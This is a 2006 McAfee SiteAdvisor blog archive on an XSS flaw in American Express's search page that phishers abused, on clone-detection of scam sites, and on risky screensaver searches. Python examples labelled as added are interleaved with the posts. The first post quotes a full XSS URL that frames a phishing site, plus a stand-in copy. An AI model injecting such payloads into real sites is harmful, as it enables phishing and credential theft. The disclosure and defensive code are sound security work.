
July 28, 2006

Phishing Express

Posted by Shane Keats at 02:55 PM

Phisher takes advantage of American Express mistake

Earlier this week, Dan Nunes, one of our software engineers, was reviewing a phishing feed when he noticed a link that pointed to americanexpress.com. At first, Dan was surprised that a financial institution would be so careless as to leave an unprotected redirect on its site. After all, financial institutions are often the targets of such phishing attacks. Upon closer examination of the link, however, he noticed JavaScript code present within the URL. The code appeared to load a frame to another site, www.cgieich.com, which at the time of this writing was mimicking the site of an Italian bank, Banca Intesa:

[Screenshot: The americanexpress.com search result page showing a fake website designed to imitate Banca Intesa.]

The need for legitimacy

A while back, we wrote an article examining the economics of phishing. In the piece, we allude to the fact that ideally, phishers like to hijack real sites to transmit stolen data back to themselves. It is not uncommon for a phisher to utilize Google or Yahoo redirects to make a link look more legitimate. Sites often use these "open redirects" to keep track of what links a user visits on their site by directing the user through a script on the host site before directing them to another site. Phishing attacks of this nature are often easy for a consumer to identify because even though the link that was clicked looked like it was going to Google, for example, the address bar will indicate that the site that eventually loaded was not in fact Google.
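The "open redirect" described above is avoidable without giving up link tracking: the redirect script can log the click and then forward the browser only to a same-site path or to an allowlisted host. The following is an added example in Python, not code from the original post or from any site it mentions; the host names, the function name and the fallback page are assumptions for the example.

```python
from urllib.parse import urlsplit

# Hosts the redirect script may forward a user to (assumed values for this example).
TRUSTED_HOSTS = {"example-bank.com", "www.example-bank.com"}


def safe_redirect_target(target, trusted_hosts=TRUSTED_HOSTS, fallback="/"):
    """Validate a redirect destination taken from a request parameter.

    The tracking script still records the click, but it forwards the browser
    only to an absolute path on this site or to a host on the allowlist.
    Anything else goes to the fallback page, so the script cannot be used to
    lend a foreign site the appearance of the trusted one.
    """
    parts = urlsplit(target)

    # Only web URLs are ever followed; any other scheme is refused.
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return fallback

    if parts.netloc == "":
        # A scheme without a host ("http:/path") is ambiguous; refuse it.
        if parts.scheme:
            return fallback
        # No host present: accept only an absolute path within this site.
        # Backslashes are refused because some browsers read "/\host" as "//host".
        if parts.path.startswith("/") and "\\" not in target:
            return target
        return fallback

    # A host is present (this also covers scheme-relative "//host/..." links).
    # urlsplit().hostname is the real host even when user-info precedes it,
    # so "http://trusted@other.example/" resolves to "other.example".
    host = (parts.hostname or "").lower()
    if host in trusted_hosts:
        return target
    return fallback
```

The point of the checks is that the decision is made on the parsed host name, not on a string prefix: a link that merely begins with the trusted domain, or that omits the scheme, still ends up at the fallback unless the real destination host is on the allowlist.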

The basic definition of a phisher is someone who attempts to con users into providing personal or financial information to a fake site under the auspices that they are interacting with a legitimate site. A fundamental tenet of phishing is that the more legitimate the site looks, the more people will be convinced to provide their information. What we saw on the feed was troubling in that regard.

Scripting for profit

Take a look at this:

http://search.americanexpress.com/amex/?q=%3Cscript%3Edocument.write%28%22%3Ciframe+src%3D%27http%3A%2F%2Fwww.cgieicg.com%27+FRAMEBORDER%3D%270%27+WIDTH%3D%27800%27+HEIGHT%3D%27640%27+scrolling%3D%27auto%27%3E%3C%2Fiframe%3E%22%29%3C%2Fscript%3E&site=amerexpress&client=amerexpress&output=amerexpress&restrict=US

The link itself points to the search results page on the American Express website. Dan found that the vulnerability arises from the fact that the query string passed to the search is displayed within the resulting page. Phishers exploited this fact to insert their own code onto the page. Since the resulting page appears to be a legitimate page within the American Express site, an unsuspecting user who fails to notice the "Search results" heading on the page or the formatting errors may be fooled into thinking he or she is sending information to a legitimate banking portal.

This vulnerability is especially glaring when one considers the fact that virtually any script could have been executed by this method. A phisher could have created a fake login form for American Express itself, leaving little clue that a user was giving his or her information to a third party. Slightly altering the link, Dan notes, can change the page that is loaded:
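The defect and its fix fit in a few lines: the search page echoed the query parameter into its HTML unchanged, and HTML-escaping that parameter before it reaches the page is what closes the hole. The Python below is an added example, not code from the original post or from American Express; the search link is a constructed stand-in with the same shape as the one quoted above (a script that writes an iframe into the query) and invented host names, and the function names are assumptions. The last function shows the triage check a feed reviewer can apply to spot this class of link.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the link quoted above: same shape (a <script> that
# writes an <iframe> into the search query), with invented host names.
SAMPLE_FEED_LINK = (
    "http://search.example-card.com/search/?q=%3Cscript%3Edocument.write%28%22"
    "%3Ciframe+src%3D%27http%3A%2F%2Fwww.phisher.example%27+WIDTH%3D%27800%27"
    "+HEIGHT%3D%27640%27%3E%3C%2Fiframe%3E%22%29%3C%2Fscript%3E&site=cards&restrict=US"
)
BENIGN_LINK = "http://search.example-card.com/search/?q=travel+rewards+card&site=cards"


def query_text(url):
    """Return the decoded 'q' parameter of a search link (empty string if absent)."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_results_vulnerable(query):
    """Echoes the request parameter into the page unchanged: the defect the post describes."""
    return "<h2>Search results for: " + query + "</h2>"


def render_results_fixed(query):
    """Escapes every character that could start markup before the text reaches the page,
    so the query is shown as text and can never become a tag or an attribute."""
    return "<h2>Search results for: " + html.escape(query, quote=True) + "</h2>"


# Markup or script appearing inside a decoded query parameter is the tell-tale of
# a reflected injection; a genuine search term has no reason to contain it.
MARKUP_IN_PARAM = re.compile(r"<\s*/?\s*(script|iframe|object|embed|form)\b|javascript\s*:", re.I)


def link_reflects_markup(url):
    """Feed triage: True if any decoded query parameter of the link carries HTML or script."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return any(MARKUP_IN_PARAM.search(v) for values in params.values() for v in values)
```

Note that the triage check decodes the parameters first: in the feed the payload appears only as percent-encoded text (`%3Cscript%3E`), and a pattern match on the raw URL would miss it.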

[Screenshot: americanexpress.com search results page shown with a frame containing the McAfee SiteAdvisor home page.]

Before running this article, Dan contacted the anti-phishing group at American Express and they have since fixed the vulnerability. Unfortunately, the average consumer who engages in online banking cannot even trust that legitimate sites are not inadvertently aiding phishers in their fraudulent collection of consumer information. Fortunately, one hurdle that phishers face is that they need to deliver their unsafe links to consumers to get them to visit the fraudulent sites. Thanks in large part to the banking institutions that have gone to great lengths to educate their customers about the dangers of phishing and ways to identify possible fraudulent sites, consumers are getting smarter about remaining skeptical of any link received through e-mail. By making sure to provide personal information only to sites received from a trusted source, and utilizing the free services of SiteAdvisor to aid in identifying potentially dangerous sites, consumers can stay safe amid the daily hazards of the web.

Update

A quick note. We wanted to remind readers that McAfee's SiteAdvisor plug-in warns users about a wide range of site-based threats including spyware, spam and exploits, but for anti-phishing and more complete threat protection, readers should look at our award-winning security suites.

July 21, 2006

Clone Detection

Posted by Shane Keats at 09:45 AM

Is Google Adwords getting scammed? McAfee SiteAdvisor has a solution.

The Web is full of interesting people. Take Ken Miyazawa, for example.

[Screenshot: clones_ken.jpg]

Ken is a man of strong opinions. Check out his endorsement of mymusicinc.com:

"I am very impressed with the speed of your download technology. The quality of the music is superior to my prior service."

He says the same thing about mimem.org/emusic:

"I am very impressed with the speed of your download technology. The quality of the music is superior to my prior service."

Peter Sanchez agrees. He has this to say about K-Lite Pro:

"I am very impressed with the speed of your download technology. The quality of the music is superior to my prior service."

Cindy Griffin is also a convert to K-Lite Pro, though not for Peter's reasons:

"I just happened to get into this, and now this is one of my favourite sites. I visit very often to get new music, softwares and stuff. Really a cool one. Thanx to the team." (sic)

She's identically effusive about k-lite.tk.

"...now this is one of my favourite sites."

In fact, Cindy is so compelling that her opinions themselves are worth copying. Hendick (sic?) Theodore writes that he too:

"...just happened to get into this, and now this is one of my favourite sites. I visit very often to get new music, softwares and stuff. Really a cool one. Thanx to the team."

Wow. Steve Richards feels the same way about Ares Ultra:

"I just happened to get into this, and now this is one of my favourite sites. I visit very often to get new music, softwares and stuff. Really a cool one. Thanx to the team."

What’s going on here? Has someone finally cloned a human being? Or is a massive wave of plagiarism sweeping the web?

The Clone Wars

What’s going on is that the bad guys are using shortcuts, and we’ve found a way to cut them off at the pass. Why are there so many nearly identical scam sites on the web? One reason for this proliferation is the quest for the perfect site, the one that maximizes profits and minimizes costs. And we can safely assume that profit maximization can be enhanced by testing sales pitch variations. Does site design A yield better click-through than site design B? What about site design C? Cost minimization can be enhanced by making site changes incrementally. Swap this graphic for that graphic, but keep the text and HTML. Change the URL but keep the text. Rearrange frames in the HTML but keep the graphics the same.

Ben Edelman, a technical advisor to SiteAdvisor and a spyware researcher, noted another, perhaps more significant motivation. Recall Google's recent announcement of a change in Adwords policy: going forward, Adwords would allow at most one ad listing for a given landing domain name. By copying the same site onto multiple domain names, a site can try to avoid this restriction and get multiple ad listing slots. Small tweaks like variations in color scheme, text or layout could also help to this end, by preventing Google's automated (and perhaps also human) reviewers from flagging all the sites as dupes.

When we first noticed these common text strings for file sharing scam sites, we asked Hugo Liu, a post-doc at the MIT Media Lab and another one of our technical advisors, if there was any way he could use this to help. Hugo specializes in semantic analysis. He tries to find patterns and meaning in what appear to be random data. Hugo began to play.

What would happen, Hugo wondered, if you took an interesting phrase and created a map of sites that shared that phrase? If the phrase originated from a known scam site, could it be used as a prospecting tool to find other similar scam sites? Perhaps clones of the original?

Hugo found that once a strong phrase is identified, it can be tested against a group of public Web sites. Think of the process as passing a lens over a stream of text as you look for a string of key words. Hugo likens it to a kid passing a magic decoder over a "spy" book. This windowing, as the process is known in corpus-based linguistics, works because bad actors re-use content in their effort to maximize profit and minimize cost.

Building a case

Hugo noticed that text analysis alone delivered a lot of false positives. For example, early efforts at clone detection yielded a lot of Wikipedia trawling sites – sites that copy a Wikipedia excerpt and then surround it with text ads. Other results had parasitically pulled text from many different sites, presumably in an effort to increase their reach in search engine results or piggyback on a more established brand. Distasteful for sure, but not a scam, at least as defined by SiteAdvisor.

Shared phrasing is like circumstantial evidence. It’s enough to bring a suspect in, but typically insufficient to convict. Hugo needed a DNA match and he found it in structural analysis.

Web developers know that a lot of HTML production is idiosyncratic. Could decisions like when to capitalize a tag be used as evidence of cloning? The answer is yes. The developer of a scam site typically reuses the template as much as possible to reduce time and cost. Consequently, any of the developer’s original quirks inherent in the template get replicated. And that gives us a huge clue.
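The two-stage method the post describes, phrase windowing to prospect for candidates and structural comparison to confirm a clone, can be shown end to end on a handful of pages. The Python below is an added example and not SiteAdvisor's or Hugo Liu's code; the testimonial sentence is taken from the post, but the HTML pages around it, the page names and the similarity threshold are constructed for the example. The windowing step treats a page as a candidate when every n-word window of the phrase occurs in its text; the structural step fingerprints each page by its tag sequence as typed (capitalization and attribute order included) and scores how much of that sequence two pages share, which is what separates a true template clone from a page that merely copied the sentence.

```python
import re
from difflib import SequenceMatcher
from html.parser import HTMLParser

# --- Constructed sample pages (the HTML is invented; only the testimonial is from the post) ---
TESTIMONIAL = ("I am very impressed with the speed of your download technology. "
               "The quality of the music is superior to my prior service.")

KNOWN_SCAM = f"""<HTML><BODY bgcolor="#ffffff"><TABLE width="600"><TR><TD>
<H1>Download Unlimited Music Now</H1>
<P>{TESTIMONIAL}</P>
<A href="join.php">Join Now</A>
</TD></TR></TABLE></BODY></HTML>"""

# Same template, with the colour, heading and link target changed.
SUSPECTED_CLONE = f"""<HTML><BODY bgcolor="#eeeeff"><TABLE width="600"><TR><TD>
<H1>Get All The Music You Want</H1>
<P>{TESTIMONIAL}</P>
<A href="signup.php">Sign Up</A>
</TD></TR></TABLE></BODY></HTML>"""

# Copied the sentence, but was built from a different template (a text-only false positive).
TEXT_COPIER = f"""<html><body><div class="ads">Sponsored links</div>
<div class="content"><h2>Reviews of music services</h2><p>{TESTIMONIAL}</p>
<p>Another review will appear here.</p></div></body></html>"""

UNRELATED = "<html><body><h1>Weather</h1><p>Sunny with a chance of rain.</p></body></html>"

PAGES = {"known-scam": KNOWN_SCAM, "suspect-a": SUSPECTED_CLONE,
         "suspect-b": TEXT_COPIER, "suspect-c": UNRELATED}


class PageScanner(HTMLParser):
    """Collects the visible text and a structural fingerprint that keeps the
    author's quirks: each tag name as typed plus the order of its attribute names."""

    def __init__(self):
        super().__init__()
        self.text = []
        self.structure = []

    def handle_starttag(self, tag, attrs):
        raw = self.get_starttag_text() or tag          # e.g. '<TABLE width="600">'
        match = re.match(r"<\s*([^\s>/]+)", raw)
        as_typed = match.group(1) if match else tag
        self.structure.append(as_typed + ":" + ",".join(name for name, _ in attrs))

    def handle_endtag(self, tag):
        self.structure.append("/" + tag)

    def handle_data(self, data):
        self.text.append(data)


def scan(html):
    """Return (visible text, structural token list) for one page."""
    scanner = PageScanner()
    scanner.feed(html)
    scanner.close()
    return " ".join(scanner.text), scanner.structure


def windows(text, n=5):
    """All n-word windows of the text, lower-cased and stripped of punctuation."""
    words = re.findall(r"[a-z0-9']+", text.lower())
    return {tuple(words[i:i + n]) for i in range(len(words) - n + 1)}


def prospect(phrase, pages, n=5):
    """Windowing step: pages whose text contains every n-word window of the phrase."""
    needle = windows(phrase, n)
    if not needle:                                     # phrase shorter than one window
        return []
    return sorted(name for name, html in pages.items() if needle <= windows(scan(html)[0], n))


def structure_similarity(html_a, html_b):
    """Share of the tag sequence two pages have in common (1.0 = identical template)."""
    return SequenceMatcher(None, scan(html_a)[1], scan(html_b)[1]).ratio()


def find_clones(known_bad_name, pages, phrase, threshold=0.9):
    """Prospect with the phrase, then keep only candidates whose template matches the known site."""
    known = pages[known_bad_name]
    return [name for name in prospect(phrase, pages)
            if name != known_bad_name and structure_similarity(known, pages[name]) >= threshold]
```

On these pages the phrase alone brings in both suspect-a and suspect-b, and the structural score then keeps only suspect-a, whose tag sequence is identical to the known site's despite the changed colour, heading and link. The threshold of 0.9 is a choice for the example; a real deployment would tune it against a labelled set.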

U2canbecloned

Lead Streams Marketing is a multi-level marketing company that offers "the Home Business System" as one of its programs. Our traditional testing discovered 4thepackage.com, an LSM affiliate, and rated it red for sending high-volume, somewhat spammy e-mail. Clone detection recently uncovered u2canbesuccessful.com. The sites are identical except for a tiny bit of text indicating ownership.

[Screenshot: 4thepackage.com and its clone u2canbesuccessful.com]

LeadStream isn't the only company posting many copies of a single web site. We've long followed sites set up by MarketEngines, CashEngines and Euclid Networks (the last company purportedly of the island of St. Kitts). Many of their sites are scams -- charging users for software that can be found elsewhere for free, and purporting to offer tech support that we've found to be practically nonexistent. They post some sites themselves, and they pay affiliates to post copies of these sites. For example, consider imusicaccess.com:

[Screenshot: imusicaccess.com]

Now, compare it to imusicnow and winmx-downloading. Structure and layout are nearly identical. The occasional font, a few strings of text and some color schemes are all that separates these clones from one another:

[Screenshot: the imusicnow and winmx-downloading clones]

These sites are clones of each other but can’t be detected using SiteAdvisor’s other automated tests because their red ratings are not due to e-mail practices or bundled spyware but because they provide services of low or no value. Clone detection lets us flag all these duplicate sites. After we identify the problem with one such site, clone detection helps us make sure we catch all its copies too.

Harder and harder to hide

Human beings are pretty sophisticated consumers but when it comes to the Web, it’s relatively easy to fool our "sixth sense." If the site looks well produced, if it appears to have original content, it’s relatively easy to overcome our basic level of skepticism. In the absence of a tool like clone detection, a typical consumer will be hard pressed to know that a particular site is a template that shares 95% of its text and 95% of its HTML with a site known to provide a bad value.

While clone detection uses technical algorithms, it succeeds thanks to economic fundamentals. Financially motivated scammers need customers, so they have no choice but to use public methods like search engine ads to reach their victims. That need to be public is their Achilles heel. Along with our automated testing for spam, spyware and exploits, tools like clone detection make it increasingly efficient for us to search for and find the bad guys.

July 05, 2006

All-Star Game of Spyware

Posted by Jonathan Cohen at 05:42 PM

MLB's greatest players and teams ranked by the danger of their screensaver searches

Barry Bonds, Derek Jeter, and Albert Pujols are household names for any baseball fanatic. They also lead the pack of the most hazardous players in McAfee's survey of the most risky baseball screensaver searches. We tested each of Major League Baseball’s 1,224 players by passing their names through Google and adding the word screensaver. Search results were enhanced by our database of 4.5 million Web safety ratings.

Searching for screensavers for Bonds, Jeter or Pujols and clicking on one of the results will give a PC a .600 "Earned Risk Average" (ERA) – in other words, a 60% chance of landing at a dangerous site. Josh Fogg of the Colorado Rockies is the only player to score higher, with 75% of his results tainted by sketchy behavior and software. Nearly three hundred players scored 30% or worse. The average ERA for the entire league was 18%.

The tech community knows that screensavers are prime candidates for adware bundles. The average Web consumer, however, is being taken advantage of. According to Yahoo's keyword selector tool, Yahoo! had roughly 3.5 million searches in May for "screensaver," "wallpaper" and related search terms. Given that Yahoo accounts for 23% of all searches, an estimated 15.1 million total searches for these desktop visual enhancements are conducted each month.

How unsafe is it to search for your favorite player? Find out the stats in McAfee SiteAdvisor’s All-Star Game of Spyware Survey.